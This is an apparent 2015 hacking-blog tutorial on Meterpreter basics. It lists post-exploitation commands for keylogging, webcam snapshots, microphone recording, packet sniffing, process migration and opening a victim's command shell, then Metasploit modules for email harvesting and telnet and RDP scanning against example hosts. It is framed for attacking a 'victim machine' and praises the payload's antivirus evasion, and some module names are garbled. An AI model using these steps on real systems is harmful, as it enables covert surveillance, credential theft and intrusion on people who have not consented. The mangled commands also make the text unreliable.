METERPRETER BASICS

Saturday 2 May 2015


                                               METERPRETER Basics

AFTER U GET A SESSION WITH THE HELP OF Metasploit HOW TO USE meterpreter HERE IS ARE THE basics

HERE's THE SECRET


Meterpreter is one of the spearheads in the metasploit framework..
It is used as a payload post exploitation of a vulnerable system.
It is used in memory DLL injection Stagers and is extended over the network at runtime.
In Memory DLL, Injection is a technique used for injection code within that address space of  currently running process by forcing it to a load a DLL (Dynamic-Link Libarary) file

The single payload is very effective with its multiple capabilities
> helps in acquiring password hashes of a victim machine
> runnng a kylogger and
> privilege escalation.

The stealth feature makes it undetectable to many antivirus and host based intrusion detection systems
Meterperter also has the capability to switch between different processes to which it gets attached through DLL injections and stays by clinging to running application on the compromised host rather than creating on the system

Classified commands

> Command type
> Command name
> Description

Commands
Process listing

> getuid -> It gets the system ID & the name of the computer
> kill -> It terminates a process
> ps -> It lists the running processes
> getpid -> It gets the current process identifier

Keylog Usage
> keyscan_start -> It starts the keylogging session
> keyscan_stop -> It stops the keylogging session
> Keyscan_dump -> It dumps the keystrokes captured from the victim machine

Session
> enumdesktops -> It lists all of the accessible desktops and workstations
> getdesktop -> It gets the current Meterpreter desktop
> setdesktop -> It changes the Meterpreter's current desktop

Sniffer Functions
> use sniffer -> It loads the sniffer functions
> sniffer_start -> It starts the sniffer for the interface
> sniffer_dump -> It dumps the network capture of the victim machine locally
> sniffer_stop -> It stops the sniffer for the interface

Webcam Commands
> webcam_list -> It lists all of the webcams of the system
> webcam_snap -> It capture snaphots of the victim machine
> record_mic -> It records the sound of the environment from the default microphone on the machine

> sysinfo -> to check the system information
> screenshot -> capture a screenshot of the victim machine
> ps -> will show the running processes

*> migrate <pid> :: example migrate 1512 (explorer.exe) -> getpid -> keysscan_start (and wait for few minutes to capture the keystrokes of the victim machine ) -> keyscan_dump -> keyscan_stop (to dump and stop the keystrokes command )

*> webcam_snap ( u get the snap from the webcame)

*> shell (to get the command shell of the victim) -> mkdir <directory name> (creating a directory) (shell is the cmd of the of the victim computer)


Vulnerability scanning and Information Gathering

:> Information Gathering Through Metasploit
Information gathering is a process of collecting information about a victim techniques.
Divided into two steps
> Footprinting
> Scanning

The Metasploit auxilliary modules have various scans from ARP to SYN
service-based scans
> HTTP
> SMB
> SQL
> SSH

Methods for Information Gathering


>> whois
         It is widely used for quering databases that store registered users of an Internet resource

type in msfconsole
   whois <domain name>
example whois hackingrtz.com

To get e-mail we use e-mail harvesting
>  E-mail harvesting is very useful tool to get the e-mail IDs associated with a particular domain

syntax
 use auxiliary/gather/ search email collector -> show options -> set domain <domain name> -> run
for example :- set domain hackingartz.com

Active Information Gathering

useful auxiliary scanner is the telnet version scanner

syntax
  use auxiliary/scanner/telnet version -> show options -> See the area is empty

syntax
   set RHOSTS <target ip address>
   for example :-  set RHOSTS 192.168.0.103 -> run

To find whether a Remote Desktop connection (RDP) is available by RDP scanner
TO know aboout the port number RDP port

Syntax : type in
     use auxiliary/scanner/rdp/ms12_020_check -> show options
getteing the port we set RHOST

syntax
    set PORTS (port no.) -> set PORTS 3389
    set RHOST (ip address) -> set RHOST 192.168.11.46
done with all the options type run

0 comments: